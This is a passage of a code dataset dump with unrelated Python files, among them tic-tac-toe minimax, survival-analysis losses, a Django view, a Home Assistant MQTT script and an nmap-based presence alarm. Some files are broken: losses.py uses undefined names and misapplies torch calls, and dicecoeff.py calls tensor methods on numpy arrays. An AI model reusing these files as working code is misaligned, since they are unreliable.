\"news\":\n thread.readNews()\n elif input == \"5\" or input == \"stock\":\n thread.readStock()\n elif input == \"8\" or input == \"nyan\" or input == \"cat\":\n thread.nyan()\n elif input == \"9\" or input == \"silent\":\n thread.silent()\n elif input == \"0\" or input == \"exit\":\n thread.input(\"Exit? (y/n)\")\n if raw_input('') is \"y\":\n thread.stop()\n time.sleep(5)\n break\n thread.reset()\n elif input == \"internet\" or input == \"network\" or input == \"net\" or input == \"connection\":\n thread.input(\"Internet on?: \" + str(internetOn()))\n elif input == \"weather\" or input == \"updateweather\":\n thread.setWeather(True)\n elif input == \"counter\" or input == \"count\" or input == \"timer\":\n input = raw_input('number: ')\n try:\n timer = \"...\".join(str(i) for i in reversed(range(int(input)))) + \"!\"\n thread.input(timer)\n except:\n logging.debug(\"Invalid number\")\n elif input == \"\":\n thread.reset()\n else:\n thread.input(input)\n except (KeyboardInterrupt, SystemExit):\n logging.exception(\"EXCEPTION\")\n logging.debug(\"To exit, press 0 or 'exit'\")\n logging.debug(\"Exitting... Goodbye!!\")\n \n\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589626789","text":"#!/usr/bin/env python\n\nfrom struct import pack\nimport cPickle as cp\nfrom numpy import array\n\n# Symmetry preprocessing\nS = cp.load(open(\"S.pkl\",'r'))\nS = array(S)\nnumS = len(S)\n\n# ---\nf = open(\"syms\",'w')\n\n# numbers\nf.write(pack('=i', numS)) # number of symmetries\n\n# Symmetries\nfor i in range(len(S)):\n for j in range(len(S[i])):\n for k in range(len(S[i][j])):\n f.write( pack('=d',float(S[i][j][k])) )\n\n# --- \nf.close()\n","sub_path":"pybvk/graveyard/input-generators/syms/pkl2syms.py","file_name":"pkl2syms.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204742204","text":"import zope.interface\n\nfrom fb.modules.base import IModule, response\nfrom fb.modules.supermodule import subone, subtwo\n\nclass SuperModule:\n\tzope.interface.implements(IModule)\n\tname=\"Supermodule Test\"\n\tdescription=\"Supermodule Test\"\n\tauthor=\"Michael Pratt (michael.pratt@bazaarvoice.com)\"\n\n\tdef register(self):\n\t\tsubone.module.register(self)\n\t\tsubtwo.module.register(self)\n\nchildren = [subone, subtwo]\nmodule = SuperModule()","sub_path":"fb/modules/supermodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"53309341","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n#author\t: Jollen Wang\n#date\t: 2016/05/10\n#version: 1.0\n\n'''\n【程序20】\n 题目:一球从100米高度自由落下,每次落地后反跳回原高度的一半;再落下,求它在\n   第10次落地时,共经过多少米?第10次反弹多高?\n'''\n\norignal = 100\nrate = 1.0\nsum = 0\n\ndown = 0\nup = 0\n\nfor i in range(1, 11):\n down = orignal * rate\n sum += (down + up)\n rate /= 2\n up = orignal * rate\n\nprint(\"The 10th down tour: %f, the 10th up hight: %f\" %(sum, up))\n\n\ns = 100.\nh = 50.0\nfor i in range(2, 11):\n s += 2*h\n h /= 2\n\nprint(\"s=%f,h=%f\" %(s, h))\n\n\n\n","sub_path":"python/test/00020.py","file_name":"00020.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639765708","text":"import torch \nimport numpy as np\n\n# https://github.com/pytorch/pytorch/issues/1249\n\n\ndef dice_coeff(pred, target, cpu=True):\n if cpu:\n pred = pred.cpu().numpy()\n target = target.cpu().numpy()\n\n smooth = 1e-5\n num = pred.size(0)\n m1 = pred.view(num, -1) # Flatten\n m2 = target.view(num, -1) # Flatten\n intersection = (m1 * m2).sum()\n\n return (2. * intersection + smooth) / (m1.sum() + m2.sum() + smooth)\n","sub_path":"utils/dicecoeff.py","file_name":"dicecoeff.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349148146","text":"def encode_direct(x):\n ret = []\n for i in x:\n if ret == []:\n ret.append(i)\n elif isinstance(ret[-1],list) and ret[-1][-1] == i:\n ret[-1][0] += 1\n elif ret[-1] == i:\n ret[-1] = [2,i]\n else:\n ret.append(i)\n return ret \n","sub_path":"P13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"214489252","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom dashboard_client.models import (OrderImpress, OrderItemImpress,\n\tOrderArt, OrderItemArt)\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom accounts.models import User\n\n\n@login_required\ndef finalize_payment(request, order_id):\n\torder = None\n\t\n\ttry:\n\t\torder = OrderArt.objects.get(id=order_id)\n\texcept:\n\t\torder = OrderImpress.objects.get(id=order_id)\n\n\tif isinstance(order, OrderArt):\n\t\treturn HttpResponse('this part yet not is finished')\n\telif isinstance(order, OrderImpress):\n\t\tcart_items = OrderItemImpress.get_cart_items(order_id)\n\t\tclient = OrderImpress.get_client(order_id)\n\t\t\n\t\tcontext = {\n\t\t\t'order': order,\n\t\t\t'cart_items': cart_items,\n\t\t\t'client': client \n\t\t}\n\t\trequest.session['order_id'] = order_id\n\t\treturn render(request, 'checkout/finalize_payment.html',\n\t\t\tcontext)\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414203018","text":"\"\"\"Tic Tac Toe implementation\"\"\"\nimport copy\nimport math\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n'''Returns starting state of the board.'''\ndef initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\n'''Returns player who has the next turn on a board.'''\ndef player(board):\n \n # bring in global X and O player values\n global X, O\n \n # declare values to hold count of X player and O player on board\n xCount = 0\n oCount = 0\n \n for row in board:\n for col in row:\n if col == X:\n xCount += 1\n elif col == O:\n oCount += 1\n\n # check if there is more X moves than O, if there is next player is O otherwise always X first\n if oCount < xCount:\n return O\n\n return X\n\n\n'''Returns set of all possible actions (i, j) available on the board.'''\ndef actions(board):\n # set to hold our actions\n allActions = set()\n \n # loop through all rows in board with rowIndex\n for rowIndex, row in enumerate(board):\n # loop through all collumns in row with index colIndex\n for colIndex, col in enumerate(row):\n # if the space at board[rowIndex][colIndex] is free create and add a tuple containing (rowIndex, colIndex) to allActions\n if col is None:\n #indexTuple = (rowIndex, colIndex)\n allActions.add((rowIndex, colIndex))\n\n return allActions\n\n'''Returns the board that results from making move (i, j) on the board.'''\ndef result(board, action):\n \n global EMPTY\n \n # allocate new memory for a copy of the board\n boardCopy = copy.deepcopy(board)\n \n # get the values from the action tuple\n#rowIndex = action[0]\n# colIndex = action[1]\n rowIndex , colIndex = action\n\n if boardCopy[rowIndex][colIndex] is EMPTY:\n boardCopy[rowIndex][colIndex] = player(board)\n\n return boardCopy\n\n\n'''returns True if there are moves left, False if there isnt'''\ndef movesLeft(board):\n \n # bring in global Empty values\n global EMPTY\n\n for row in board:\n for col in row:\n if col is EMPTY:\n return True\n return False\n\n'''Returns the winner of the game, if there is one.'''\ndef winner(board):\n gameWinner = None\n \n # checks for diagonal winner from top left to bottom right and bottom left to top right\n if(board[0][0] == board[1][1] and board[1][1] == board[2][2]) or\\\n (board[0][2] == board[1][1] and board[2][0] == board[1][1]):\n gameWinner = board[1][1]\n return gameWinner\n\n for i in range(3):\n #checks for winner on each row\n if board[i][0] == board[i][1] and board[i][1] == board[i][2]:\n gameWinner = board[i][1]\n break\n \n # checks for winner on each collumn\n elif board[0][i] == board[1][i] and board[1][i] == board[2][i]:\n gameWinner = board[1][i]\n break\n\n return gameWinner\n\n'''Returns True if game is over, False otherwise.'''\ndef terminal(board):\n if winner(board) is None and movesLeft(board):\n return False\n return True\n\n\n'''Returns 1 if X has won the game, -1 if O has won, 0 otherwise.'''\ndef utility(board):\n \n # bring in global X and O player values\n global X, O\n\n if terminal(board):\n gameWinner = winner(board)\n\n if gameWinner == X:\n winnerNumber = 1\n \n elif gameWinner == O:\n winnerNumber = -1\n\n else:\n winnerNumber = 0\n\n return winnerNumber\n \n return None\n\n'''our helper recursive method for minimax function but with a set depth to stop at'''\ndef minimaxRecDepth(board, isMaximizer, depth):\n # if end state return 1 for max win -1 for min win and 0 for tie\n if utility(board) is not None:\n if isMaximizer:\n return utility(board) + depth\n else:\n return utility(board) - depth\n\n if isMaximizer == True:\n score = -math.inf\n for action in actions(board):\n newBoard = result(board, action)\n print(\"Before \" + str(depth))\n minPlayer = minimaxRecDepth(newBoard, not isMaximizer, depth + 1)\n print(\"After \" + str(depth))\n score = max(minPlayer,score)\n\n return score\n\n elif isMaximizer == False:\n score = math.inf\n for action in actions(board):\n newBoard = result(board, action)\n print(\"Before \" + str(depth))\n maxPlayer = minimaxRecDepth(newBoard,not isMaximizer, depth + 1)\n print(\"After: \" + str(depth))\n score = min(maxPlayer, score)\n \n return score\n\n'''our helper recursive method for the minimax function'''\ndef minimaxRec(board, isMaximizer):\n \n # if end state return 1 for max win -1 for min win and 0 for tie\n if utility(board) is not None:\n return utility(board)\n \n if isMaximizer == True:\n score = -math.inf\n for action in actions(board):\n newBoard = result(board, action)\n minPlayer = minimaxRec(newBoard, not isMaximizer)\n score = max(minPlayer,score)\n \n return score\n\n elif isMaximizer == False:\n score = math.inf\n for action in actions(board):\n newBoard = result(board, action)\n maxPlayer = minimaxRec(newBoard,not isMaximizer)\n score = min(maxPlayer, score)\n \n return score\n\n'''Returns the optimal action for the current player on the board.'''\ndef minimax(board):\n \n if terminal(board):\n return None\n\n best_score = None\n maximizer = None\n best_action = None\n\n if player(board) == \"X\":\n maximizer = True\n best_score = -math.inf\n else:\n maximizer = False\n best_score = math.inf\n\n for action in actions(board):\n move = result(board,action)\n score = minimaxRec(move, not maximizer)\n #score = minimaxRecDepth(move, not maximizer, 0)\n \n if maximizer:\n if score > best_score:\n best_score = score\n best_action = action\n else:\n if score < best_score:\n best_score = score\n best_action = action\n\n return best_action\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"400398463","text":"import torch\nfrom scipy.optimize import root_scalar\nfrom scipy.stats import gaussian_kde\n\n\nclass Loss:\n terminal_layer = None\n N_OUTPUTS = None\n\n def __repr__(self):\n classname = self.__class__.__name__\n s = \"\"\"\"\"\" % (\n classname, self.N_OUTPUTS\n )\n return s\n\n def cumulative_hazard(self, params, t):\n # must override this or survival_function\n return -torch.log(self.survival_function(params, t))\n\n def survival_function(self, params, t):\n # must override this or cumulative_hazard\n return torch.exp(-self.cumulative_hazard(params, t))\n\n def hazard(self, params, t):\n return self.cumulative_hazard(params, t)\n\n def log_hazard(self, params, t):\n return torch.log(torch.clamp(self.hazard(params, t), 1e-30))\n\n def inform(self, **kwargs):\n pass\n\n\nclass GeneralizedGamma(Loss):\n\n N_OUTPUTS = 3\n\n def __init__(self, topology):\n self.terminal_layer = [stax.Dense(self.N_OUTPUTS)]\n raise NotImplementedError(\"Jax still needs to have support for incomplete gamma function\")\n\n def cumulative_hazard(self, params, t):\n pass\n\n def log_hazard(self, params, t):\n pass\n\n\n\nclass ParametricMixture(Loss):\n \"\"\"\n\n ::math\n\n S(t | x) = p_1(x) S_{Weibull}(t | x) + p_2(x) S_{LogLogistic}(t | x) + p3(x)\n\n\n \"\"\"\n N_OUTPUTS = 3 + 2 + 2\n\n def __init__(self):\n self.terminal_layer = [\n stax.Dense(self.N_OUTPUTS, W_init=stax.randn(1e-10), b_init=stax.randn(1e-10))\n ]\n\n def cumulative_hazard(self, params, t):\n # weights\n ln_p = params[:3] - torch.logsumexp(params[:3], -1)\n ln_p1, ln_p2, ln_p3 = ln_p\n # p1, p2, p3 = torch.clamp(torch.softmax(params[:3]), 1e-25)\n\n # weibull params\n lambda_, rho_ = torch.exp(params[3]), torch.exp(params[4])\n\n # loglogistic params\n # alpha_, beta_ = torch.exp(params[5]), torch.exp(params[6])\n ln_alpha, ln_beta = params[5:7]\n term2 = torch.log(t) - ln_alpha\n\n v = -torch.logsumexp(\n torch.hstack(\n (\n ln_p1 - (t / lambda_) ** rho_,\n ln_p2 - torch.logsumexp(torch.stack((0, torch.exp(ln_beta) * term2))),\n ln_p3,\n )\n )\n )\n return v\n\n\nclass PiecewiseConstant(Loss):\n def __init__(self, breakpoints):\n self.N_OUTPUTS = len(breakpoints) + 1\n self.breakpoints = torch.hstack(([0], breakpoints, torch.tensor([np.inf])))\n self.terminal_layer = [\n stax.Dense(\n self.N_OUTPUTS, W_init=stax.randn(1e-7), b_init=stax.randn(1e-7)\n ),\n stax.Exp,\n ]\n\n def __repr__(self):\n try:\n classname = self.__class__.__name__\n s = \"\"\"\"\"\" % (\n classname, self.breakpoints\n )\n except:\n s = \"\"\"\"\"\" % classname\n return s\n\n def cumulative_hazard(self, params, t):\n M = torch.minimum(self.breakpoints, t)\n M = torch.diff(M)\n return (M * params).sum()\n\n \"\"\"\n def hazard(self, params, t):\n ix = torch.searchsorted(self.breakpoints, t)\n or\n ix = 0\n for tau in self.breakpoints:\n if t < tau:\n break\n ix += 1\n return params[ix]\n \"\"\"\n\n\nclass NonParametric(PiecewiseConstant):\n \"\"\"\n We create the concentration of breakpoints in proportional to the number of subjects that died around that time.\n See blog post at https://dataorigami.net/blogs/napkin-folding/non-parametric-survival-function-prediction\n \"\"\"\n\n def __init__(self, n_breakpoints=None):\n self.n_breakpoints = n_breakpoints\n\n def inform(self, **kwargs):\n T = kwargs.pop(\"T\")\n E = kwargs.pop(\"E\")\n\n # first take a look at T, and create a KDE around the deaths\n breakpoints = self.create_breakpoints(T[E.astype(bool)])\n super(NonParametric, self).__init__(breakpoints)\n\n def create_breakpoints(self, observed_event_times):\n def solve_inverse_cdf_problem(f, fprime=None, starting_point=0):\n return root_scalar(f, x0=starting_point, fprime=fprime).root\n\n n_obs = observed_event_times.shape[0]\n dist = gaussian_kde(observed_event_times)\n\n if self.n_breakpoints is None:\n n_breakpoints = min(int(torch.sqrt(n_obs) / 2), torch.unique(observed_event_times).shape[0])\n else:\n n_breakpoints = self.n_breakpoints\n\n breakpoints = torch.empty(n_breakpoints)\n\n # We scale our pdf/cdf by CDF(max observed time) so that we will\n # never have breakpoints greater than the max observed time.\n # call this cdf'\n MAX = observed_event_times.max()\n CDF_M = dist.integrate_box_1d(0, MAX)\n\n sol = 0\n for i, p in enumerate(torch.linspace(0, 1, n_breakpoints + 2)[1:-1]):\n # solve the following simple root problem:\n # cdf'(x) = p\n # cdf(x)/cdf(M) = p\n # cdf(x) = p * cdf(M)\n # cdf(x) - p*cdf(M) = 0\n sol = solve_inverse_cdf_problem(\n f=lambda x: dist.integrate_box_1d(0, x) / CDF_M - p,\n fprime=lambda x: dist(x) / CDF_M,\n starting_point=sol)\n breakpoints[i] = sol\n return breakpoints\n","sub_path":"lifelike/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563322606","text":"###############################################################################\n# @author : Rohan Kapoor\n# @date : 08/31/2018\n# @name : hasp_reset_all_screens.py\n# @description : Resets to the last viewed screen\n# @params : All params are taken as strings from Home Assistant\n# entities: A list of input numbers that are storing the active pages\n###############################################################################\n\ndef get_nodename(entity_id):\n if not entity_id.startswith('input_number.'):\n return None\n\n prefix = 'input_number.hasp_'\n suffix = '_activepage'\n start = entity_id.find(prefix)\n end = entity_id.find(suffix)\n if start == -1 or end == -1:\n return None\n return entity_id[(start + len(prefix)):end]\n\ndef reset_hasp_screen(hass, entity_id):\n global get_nodename\n nodename = get_nodename(entity_id)\n if not nodename:\n return\n\n cur_state = hass.states.get(entity_id)\n if not cur_state:\n return\n\n hass.services.call('mqtt', 'publish', {\n 'topic': 'hasp/{}/command/page'.format(nodename),\n 'payload': int(float(cur_state.state))\n })\n return\n\nentities = data.get('entities')\n\nif isinstance(entities, str):\n entities = [e.strip() for e in entities.split(',')]\n for entity_id in entities:\n reset_hasp_screen(hass, entity_id)\n","sub_path":"python_scripts/hasp_reset_all_screens.py","file_name":"hasp_reset_all_screens.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438168383","text":"\nimport subprocess\nimport datetime\nfrom twilio.rest import TwilioRestClient \n\n\n# Put your own credentials here \nipRange = \"\"\naddress = \"\" # MAC address of device\nACCOUNT_SID = \"AC\" # Twilio SID\nAUTH_TOKEN = \"\" # Twilio Token\nto_=\"\" # Phone Number receiving text\nfrom__=\"\" # Twilio number\n\n\n# Returns if device is connected, false otherwise\n# May take time based on ip range specified\ndef ipcheck():\n # Customize ip range\n result=subprocess.check_output(\"sudo nmap -sn \" + ipRange, shell=True)\n for mac in result.split():\n if len(mac) == len(address):\n if mac == address:\n print(\"True\")\n return True\n return False\n \n\n# Notify user that door has been opened when the device searched is \n# not connected by sending a text to the phone \ndef alert():\n \n client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN) \n currentTime = datetime.datetime.now().time()\n currentTime.isoformat()\n client.messages.create(to=to_, from_=from__,\n body=\"Intruder! \" + str(currentTime)[:-10], ) \n \n# Main loop\ndef main():\n while True:\n if not ipcheck():\n continue\n #alert()\n\nmain()\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226783277","text":"'''\nThis module implements InitalizeOthello and OthelloApplication,\nthe GUI based on tkinter module.\nThe first class provides GUI that user can\ninput data for row, column, first player, and winning condition\nto initialize the othello game.\nThe second class provides the environment that the players can\nset the game board and play it. Also, this class shows the result of the\ngame on the board.\n\n'''\nimport tkinter\nimport othello_model\nimport math\nimport othello\n'''\nInitializeOthello()\nThis class is to make the graphical user interface that\nthe allows the user put the data initializing the game Othello.\nThe user can input row value, column value, the player who will\nhave the choice to place disc first, and the winning condition, which\nis if the user have most disc would be the winner or not.\nThis checks if the data input from user is valid or not to initialize the game.\nWhen the user gets success in initializing data, it makes an OhtelloApplication object\nto show the user the board of the game.\n\n'''\nclass InitializeOthello():\n def __init__ (self):\n '''\n Constructor\n This initializes a label showing the game title,\n a label and an entry to show row and to let the user input\n the row value,\n a label and an entry to show column and to let the user input\n the column value,\n a label and an entry to show first player, allowing the user input\n the first player value,\n a label and an entry to show winning condition and to let the user\n input winning condition,\n and a button to pass above all data to OhtelloApplication class\n to make the class object to proceed the game process.\n '''\n # root\n self._root = tkinter.Tk()\n\n # Label to show the game title - \"OTHELLO GAME\"\n self._oth_label = tkinter.Label(self._root, text = \"OTHELLO GAME\")\n self._oth_label.grid(row = 0)\n\n # Label and Entry for row value\n self._row_lb = tkinter.Label(self._root, text = 'Row:')\n self._row_lb.grid(row = 1)\n self._row_entry = tkinter.Entry(self._root)\n self._row_entry.grid(row=1, column=1)\n\n # Label and Entry for column value\n self._col_lb = tkinter.Label(self._root, text = 'Column:')\n self._col_lb.grid(row = 2)\n self._col_entry = tkinter.Entry(self._root)\n self._col_entry.grid(row = 2, column = 1)\n\n # Label and Entry for first player value\n self._f_player = tkinter.Label(self._root, text = 'First Player: (B/W)')\n self._f_player.grid(row = 3)\n self._f_player_ent = tkinter.Entry(self._root)\n self._f_player_ent.grid(row = 3, column = 1)\n\n # Label and Entry for winning condition value\n self._win_cond_lb = tkinter.Label(self._root, text = \"Winning Condition ()\")\n self._win_cond_lb.grid(row = 4)\n self._win_cond_ent = tkinter.Entry(self._root)\n self._win_cond_ent.grid(row =4, column = 1)\n\n # Button for the next step\n self._next = tkinter.Button(self._root,text='Next')\n self._next.bind('', self._call_board_init)\n self._next.grid(row = 5)\n\n def run(self):\n '''\n This runs the root window\n '''\n self._root.mainloop()\n\n def _call_board_init(self,event:tkinter.Event):\n '''\n This class checks the error with the data, row, col, first player,\n and winning condition by calling _input_valid_check.\n If the data is all valid, this makes an OthelloApplication object\n to go to the next step.\n If one of the data input is invalid it shows what and how the data is wrong\n within a message window\n '''\n try:\n row = int(self._row_entry.get().strip())\n col = int(self._col_entry.get().strip())\n first_p = self._f_player_ent.get().strip()\n win_cond = self._win_cond_ent.get().strip()\n\n self._input_valid_check(row,col,first_p,win_cond)\n ot = OthelloApplication(row, col,first_p, win_cond, self._root)\n self._root.destroy()\n\n except ValueError:\n msg = \"The value of row or col for initialization should be integer\"\n self._error_msg(msg)\n except othello.RowColInputNotEven:\n msg = \"The valuf of row and col should be even numbers\"\n self._error_msg(msg)\n except othello.InvalidRowColInput:\n msg = \"The value of row and col should be range from \" + str(othello.MIN) + \" to \" + str(othello.MAX)\n self._error_msg(msg)\n except othello.InvalidPlayerChoose:\n msg = \"The player selection must be either B or W\"\n self._error_msg(msg)\n except othello.InvalidWinningCondition:\n msg = \"Invalid input for winning condition\"\n self._error_msg(msg)\n\n def _input_valid_check(self, row, col, first_p, win_cond):\n '''\n This function checks validity of inputs that are row value,\n columnm value, first player of the game, and the winning condition\n used to intialize the game\n '''\n if row % 2 != 0 or col % 2 != 0:\n raise othello.RowColInputNotEven\n\n if row > othello.MAX or col > othello.MAX or \\\n row < othello.MIN or col < othello.MIN:\n raise othello.InvalidRowColInput\n\n if first_p != 'B' and first_p != 'W':\n raise othello.InvalidPlayerChoose\n\n if win_cond != '<' and win_cond != '>':\n raise othello.InvalidWinningCondition\n\n def _error_msg(self, msg):\n '''\n This pops up an error message to user with msg\n '''\n window = tkinter.Tk()\n lb = tkinter.Label(window, text = \"ERROR\\n\"+msg)\n lb.pack(padx = 20)\n\n\n'''\nOthelloApplication\nThis class, first, is divided in to two different frame.\n\nThe first frame, which is the upper is to mainly show the rule of the game,\nwhich player is at current turn, the score of each disc, the button to process the next step.\n\nThe bottom frame shows the board of the game that users can place the disc at their own turn.\n\n'''\nclass OthelloApplication():\n def __init__(self, row_max:int, col_max:int, first_player:str, win_cond :str ,root):\n\n self._root_window = tkinter.Tk()\n\n # Data for board size, the first player, the winning condition\n self.row_max = row_max\n self.col_max = col_max\n self.first_player = first_player\n self.curr_player = 'B'\n self.win_cond = win_cond\n\n # If it's True, it means the game is on initialization mode for the game board\n self.init_mode = True\n self.cell_state = othello_model.CellState()\n\n self.width = self.row_max * othello_model.CELL_WID\n self.height = self.col_max * othello_model.CELL_HEI\n\n ####################################################\n #_upper_frame\n ####################################################\n self._upper_frame = tkinter.Frame(self._root_window)\n self._upper_frame.pack(fill = 'x')\n\n # A label to show the game rule\n self._rule = tkinter.Label(self._upper_frame, text = 'FULL', bg = 'green')\n self._rule.pack()\n\n # A label to show which player is at the current turn\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text = \"Place black disc first\")\n self._curr_p_init_lb.pack(side = 'left')\n\n # A button to process next step of the game during initialization of the board\n self._next = tkinter.Button(self._upper_frame, text = 'Next')\n self._next.bind('' ,self._change_init_to_white)\n self._next.pack(side = 'right')\n\n # To show the score of the each board, they are Label objects\n self._black_score = None\n self._white_score = None\n\n ####################################################\n # Bottom Frame\n ####################################################\n self._bottom_frame = tkinter.Frame(self._root_window)\n self._bottom_frame.pack()\n # the game board\n self._board = tkinter.Canvas(self._bottom_frame, width = self.width, height = self.height, bg = 'green')\n self._board.pack(padx = 20, pady = 20)\n\n self._create_board(self.width, self.height)\n\n self._board.bind('', self._on_board_clicked)\n self._board.bind('', self._on_canvas_resize)\n\n def _create_board(self, row, col):\n '''\n This class makes the game board sized by row x col\n '''\n delta_x, delta_y = self._get_delta_x_y()\n\n row = row - (row%self.row_max)\n col = col - (col%self.col_max)\n\n\n if delta_x == 0 and delta_y == 0:\n delta_x = 3\n delta_y = 3\n\n for x in range(delta_x, row, delta_x):\n self._board.create_line(x, 0, x, col, fill=\"black\")\n for y in range(delta_y, col, delta_y):\n self._board.create_line(0, y, row, y, fill=\"black\")\n\n\n def _on_canvas_resize(self,event : tkinter.Event):\n '''\n This function is triggered when user tries to resize the window\n of the game. This resizes the game board according to the chaning size of\n the game board.\n '''\n try:\n self._board.delete(tkinter.ALL)\n wid = self._board.winfo_width()\n hei = self._board.winfo_height()\n self._create_board(wid, hei)\n self._draw_discs()\n except ValueError:\n pass\n\n\n def _on_board_clicked(self, event: tkinter.Event):\n '''\n This function is triggered when the users make mouse click on\n _board canvas to place a disc or discs chosen by the player at the\n current turn at each cell on the board.\n Then it updates the game board.\n '''\n delta_x, delta_y = self._get_delta_x_y()\n\n row = int(event.y/delta_y)\n col = int(event.x/delta_x)\n\n if self.init_mode :\n color = othello_model.get_disc_color(self.curr_player)\n self.cell_state.add_dics(row,col,color)\n\n else:\n try:\n self.cell_state.put_discs(row,col)\n self._update_turn()\n\n except othello.GameOverException:\n self._winner_msg()\n except othello.NoAnothersMove:\n pass\n except othello.InvalidMoveError:\n pass\n finally:\n self.cell_state.update_cell_state()\n self._update_score()\n\n self._draw_discs()\n\n\n def _draw_discs(self):\n '''\n This draws all discs of each color on the game board as cell_state\n object specifies\n '''\n discs = self.cell_state.get_all_discs()\n\n for color, coord in discs.items():\n for row,col in coord:\n self._draw_disc(row, col, color)\n\n def _draw_disc(self, row, col, color):\n '''\n This function places a disc colored by the color at the\n coordinate specified by row and col\n '''\n delta_x,delta_y = self._get_delta_x_y()\n\n row *= delta_y # y coordinate\n col *= delta_x # x coordinate\n x = (delta_x/2)\n y = (delta_y/2)\n self._board.create_oval(col + (x * .5), row + (y * .5), col + (x*othello_model.DISC_DIAM) , row + (y*othello_model.DISC_DIAM)\n ,fill = color)\n\n def _change_init_to_white(self, event: tkinter.Event):\n '''\n This function is to change the turn from black to white to let\n the white user place discs as the player wants in initializing board.\n This changes the next button to a button to start the game by finishing\n the initialization of the game board.\n '''\n self.curr_player = 'W'\n\n self._curr_p_init_lb.destroy()\n self._next.destroy()\n\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"Place white disc\")\n self._curr_p_init_lb.pack(side='left')\n\n self._next = tkinter.Button(self._upper_frame, text='GameStart')\n self._next.bind('', self._game_start)\n self._next.pack(side='right')\n\n\n def _game_start(self, event:tkinter.Event):\n '''\n This function is triggered when user click the gamestart button.\n '''\n try:\n self.curr_player = othello_model.get_disc_color(self.first_player)\n self.init_mode = False\n b_list, w_list = self.cell_state.get_all_discs().values()\n self.cell_state.init_othello(self.row_max, self.col_max, self.first_player, self.win_cond, b_list, w_list)\n self._update_turn()\n except othello.GameOverException:\n self._winner_msg()\n except othello.NoAnothersMove:\n self._update_turn()\n finally:\n self._next.destroy()\n self._update_score()\n\n\n def _update_turn(self):\n '''\n This function is to update the current turn of the game\n '''\n self.curr_player = self.cell_state.next_turn()\n self._curr_p_init_lb.destroy()\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"TRUN: \" + self.curr_player)\n self._curr_p_init_lb.pack()\n\n\n def _update_score(self):\n '''\n This function is to update and show the score of each disc to the users.\n '''\n b_list, w_list = self.cell_state.get_all_discs().values()\n\n b_score = len(b_list)\n w_score = len(w_list)\n\n if self._black_score and self._white_score != None:\n self._black_score.destroy()\n self._white_score.destroy()\n\n self._black_score = tkinter.Label(self._upper_frame, text = 'Black: ' + str(b_score))\n self._white_score = tkinter.Label(self._upper_frame, text = \"White: \" + str(w_score))\n self._black_score.pack(side = 'left', padx= 20)\n self._white_score.pack(side = 'right',padx = 20)\n\n def _winner_msg(self):\n '''\n This is making a window showing which player is the winner of the game\n based on the winning condition.\n '''\n winner = self.cell_state.winner()\n self._curr_p_init_lb.destroy()\n self._curr_p_init_lb = tkinter.Label(self._upper_frame, text=\"GAMEOVER\\nWINNER: \" + winner)\n self._curr_p_init_lb.pack(padx= 20)\n\n def _get_delta_x_y (self):\n '''\n This function returns width and column of each cell as integer\n '''\n delta_x = int(self._board.winfo_width() / self.col_max)\n delta_y = int(self._board.winfo_height() / self.row_max)\n return (delta_x, delta_y)\n\n\n","sub_path":"Othello/othello_view.py","file_name":"othello_view.py","file_ext":"py","file_size_in_byte":14672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135698377","text":"class Solution:\n def reverseBetween(self, head, m, n):\n \"\"\"\n :type head: ListNode\n :type m: int\n :type n: int\n :rtype: ListNode\n \"\"\"\n if m == n:\n return head\n if m != 1:\n left = head\n left_prev = head\n for _ in range(m - 1):\n left_prev = left\n left = left.next\n right = left\n right_prev = left\n for _ in range(n - m + 1):\n right_prev = right\n right = right.next\n right_prev.next = None\n inner_head, inner_tail = self.reserseList(left)\n left_prev.next = inner_head\n inner_tail.next = right\n else:\n p = head \n v = head\n for _ in range(n):\n v = p\n p = p.next\n v.next = None\n head, tail = self.reserseList(head)\n tail.next = p\n\n return head\n \n def reserseList(self, head):\n if not head:\n return\n if not head.next:\n return head\n current = head\n prev = None\n while current:\n next_node = current.next\n current.next = prev\n prev = current\n current = next_node\n return prev, head \n ","sub_path":"0-100/92_reverse_linked_list2.py","file_name":"92_reverse_linked_list2.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 